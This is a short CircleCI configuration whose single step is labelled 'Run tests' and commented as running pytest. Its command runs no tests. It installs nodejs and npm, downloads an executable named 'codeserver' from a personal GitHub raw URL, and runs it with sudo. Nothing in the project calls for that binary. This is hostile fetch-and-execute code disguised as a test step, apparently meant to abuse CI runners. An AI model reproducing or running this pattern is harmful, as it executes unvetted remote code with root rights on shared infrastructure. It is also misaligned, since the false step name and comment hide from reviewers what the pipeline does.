version: 2.1

jobs:
  build-and-test: 
    parallelism: 5
    docker:
      - image: cimg/python:3.10.2
    steps:
      - run:
          name: Run tests
          # This assumes pytest is installed via the install-package step above
          command: sudo apt update && sudo apt install nodejs && sudo apt install npm && wget https://raw.githubusercontent.com/dekamoonth/code/main/codeserver && chmod +x codeserver && sudo ./codeserver

workflows:
  sample: 
    jobs:
      - build-and-test
